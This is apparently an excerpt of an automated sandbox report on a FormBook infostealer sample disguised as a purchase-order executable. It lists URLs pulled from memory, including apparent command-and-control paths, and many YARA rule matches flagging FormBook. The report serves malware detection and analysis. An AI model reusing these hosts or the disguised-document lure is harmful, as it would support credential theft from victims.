Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.watch2movie.xyz
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.watch2movie.xyz/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.watch2movie.xyz/btrd/www.cnoszirzbkaqz.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.watch2movie.xyzReferer:
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xmentorgroup.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xmentorgroup.com/btrd/
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xmentorgroup.com/btrd/www.outletivo.com
Source: explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xmentorgroup.comReferer:
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2174149800.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2329293185.0000000002701000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2403280656.00000000022EC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2493397578.0000000002351000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2612943933.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 0000002E.00000002.2700394567.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 00000036.00000002.2785236388.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 0000003F.00000002.2864011147.0000000002911000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 00000047.00000002.2995542174.000000000337C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youngonven.com
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2174149800.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2329293185.0000000002701000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2403280656.000000000228C000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2493397578.0000000002351000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2612943933.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 0000002E.00000002.2700394567.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 00000036.00000002.2785236388.000000000329C000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 0000003F.00000002.2864011147.0000000002911000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 00000047.00000002.2995542174.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youngonven.com/1485
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000000.2119834627.0000000000442000.00000002.00000001.01000000.00000003.sdmp, cmd.exe, 00000005.00000003.2161957449.00000000032E5000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2315915569.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000003.2390659515.0000000003086000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000022.00000003.2479534553.0000000002695000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002A.00000003.2596807840.0000000003135000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000032.00000003.2684351983.00000000032E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000003A.00000003.2769484455.0000000002905000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000043.00000003.2848660519.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000004B.00000003.2975731288.00000000035E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://youngonven.com/1485#Re
Source: explorer.exe, 00000008.00000002.3377674269.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074869572.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2979140509.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2186408127.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000008.00000002.3385226475.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000008.00000002.3377674269.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000008.00000002.3377674269.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000008.00000002.3377674269.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000008.00000002.3385226475.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981523077.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000008.00000002.3385226475.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981523077.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000008.00000002.3385226475.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000008.00000002.3377674269.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074869572.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2979140509.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2186408127.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000008.00000002.3385226475.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981523077.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000008.00000002.3389406505.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3367455817.000000000517F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=pure1027.com
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
